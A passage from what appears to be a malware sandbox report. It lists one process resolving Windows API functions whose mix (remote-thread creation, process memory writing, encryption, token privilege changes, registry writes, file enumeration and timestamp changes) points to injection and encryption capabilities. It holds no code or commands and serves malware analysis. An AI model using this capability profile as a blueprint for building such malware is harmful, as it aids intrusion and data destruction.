| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x759ddd0e |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x759d14e9 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SystemTimeToFileTime, address_out = 0x759d5a7e |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalMemoryStatusEx, address_out = 0x759fd4c4 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x759d103d |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x759d170d |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedIncrement, address_out = 0x759d1400 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTime, address_out = 0x759d5a96 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFreeEx, address_out = 0x759ed9c8 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsBadReadPtr, address_out = 0x759fd075 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiW, address_out = 0x759ed5cd |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenMutexW, address_out = 0x759d5151 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetEndOfFile, address_out = 0x759ece2e |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x759d17ec |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x759d469b |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = RemoveVectoredExceptionHandler, address_out = 0x77d25f41 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x759d1809 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x759d1b00 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExW, address_out = 0x759d1ae5 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DuplicateHandle, address_out = 0x759d1886 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x759d1245 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = AddVectoredExceptionHandler, address_out = 0x77d2742b |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x759d7a10 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x759d11f8 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileW, address_out = 0x759f830d |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiA, address_out = 0x759d3e8e |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsWow64Process, address_out = 0x759d195e |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstChangeNotificationW, address_out = 0x759ed851 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindNextChangeNotification, address_out = 0x759f5c1e |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessInJob, address_out = 0x759fc7ea |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateRemoteThread, address_out = 0x75a5416b |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateNamedPipeW, address_out = 0x75a5414b |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DisconnectNamedPipe, address_out = 0x75a541df |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ConnectNamedPipe, address_out = 0x75a540fb |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalDrives, address_out = 0x759d5371 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x759d418b |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultUILanguage, address_out = 0x759d44ab |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x759f3b92 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableW, address_out = 0x759d1b48 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x759d17d1 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSection, address_out = 0x77ce2c42 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeZoneInformation, address_out = 0x759d465a |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x759d192e |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFileAttributesW, address_out = 0x759ed4f7 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeNameForVolumeMountPointW, address_out = 0x759e052f |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x759d1986 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileTime, address_out = 0x759d4407 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReleaseMutex, address_out = 0x759d111e |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77cd2270 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x759d4950 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFileTime, address_out = 0x759eecbb |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = RemoveDirectoryW, address_out = 0x75a544cf |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x759d1856 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsW, address_out = 0x759d4173 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x759d1282 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x759d54ee |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x77cd22b0 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesW, address_out = 0x759d1b18 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x759d4442 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenEventW, address_out = 0x759d15d6 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTempPathW, address_out = 0x759ed4dc |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x759d11a9 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x759d14c9 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapCreate, address_out = 0x759d4a2d |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteProcessMemory, address_out = 0x759ed9e0 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSizeEx, address_out = 0x759d59e2 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x759d4435 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedExchange, address_out = 0x759d1462 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeInformationW, address_out = 0x759ec860 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x759d3ed3 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryW, address_out = 0x759d4259 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x759d34c8 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x759d34b0 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x759d1222 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryW, address_out = 0x759d492b |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x759f8baf |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x759f896c |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x759d11c0 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x759f735f |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x759d3f5c |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexW, address_out = 0x759d424c |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ResetEvent, address_out = 0x759d16dd |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x759d1410 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetEvent, address_out = 0x759d16c5 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x759d10ff |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventW, address_out = 0x759d183e |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x759d1136 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForMultipleObjects, address_out = 0x759d4220 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x759d110c |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x759d186e |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetIconInfo, address_out = 0x758e49ea |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DrawIcon, address_out = 0x758e8deb |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = LoadImageW, address_out = 0x758dfbd1 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetCursorPos, address_out = 0x758e1218 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x77ce25dd |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x758d8a29 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = UnregisterClassW, address_out = 0x758d9f84 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetKeyboardLayoutList, address_out = 0x758e2e69 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CharLowerA, address_out = 0x758e3e75 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CharToOemW, address_out = 0x75931a26 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x758d7809 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = PeekMessageW, address_out = 0x758e05ba |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x758d787b |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = MsgWaitForMultipleObjects, address_out = 0x758e0b4a |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x758db17d |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = SetWindowLongA, address_out = 0x758e6110 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetWindowLongA, address_out = 0x758dd156 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CharUpperW, address_out = 0x758df350 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x758d9a55 |
|
1 | |
| Module | Load | module_name = CRYPT32.dll, base_address = 0x76240000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\crypt32.dll, function = CryptImportPublicKeyInfo, address_out = 0x76256c0e |
|
1 | |
| Module | Load | module_name = CRYPT32.dll, base_address = 0x76240000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\crypt32.dll, function = CryptDecodeObjectEx, address_out = 0x7624d718 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x7775469d |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetAce, address_out = 0x777545f0 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x7776779b |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthorityCount, address_out = 0x77750e0c |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = AllocateAndInitializeSid, address_out = 0x777540e6 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthority, address_out = 0x77750e24 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetEntriesInAclW, address_out = 0x77752a66 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExW, address_out = 0x777540fe |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptVerifySignatureW, address_out = 0x7774c54a |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetNamedSecurityInfoW, address_out = 0x77749fe2 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetNamedSecurityInfoW, address_out = 0x7774f4fd |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptCreateHash, address_out = 0x7774df4e |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptHashData, address_out = 0x7774df36 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorSacl, address_out = 0x77754680 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x777514d6 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyHash, address_out = 0x7774df66 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = OpenProcessToken, address_out = 0x77754304 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = FreeSid, address_out = 0x7775412e |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = InitializeSecurityDescriptor, address_out = 0x77754620 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x7775468d |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x7774c532 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = ConvertStringSecurityDescriptorToSecurityDescriptorW, address_out = 0x77751f59 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = OpenThreadToken, address_out = 0x7775432c |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x777546ad |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x7774e124 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetTokenInformation, address_out = 0x7775431c |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyKey, address_out = 0x7774c51a |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = AdjustTokenPrivileges, address_out = 0x7775418e |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorDacl, address_out = 0x7775415e |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetSecurityDescriptorSacl, address_out = 0x77754608 |
|
1 | |
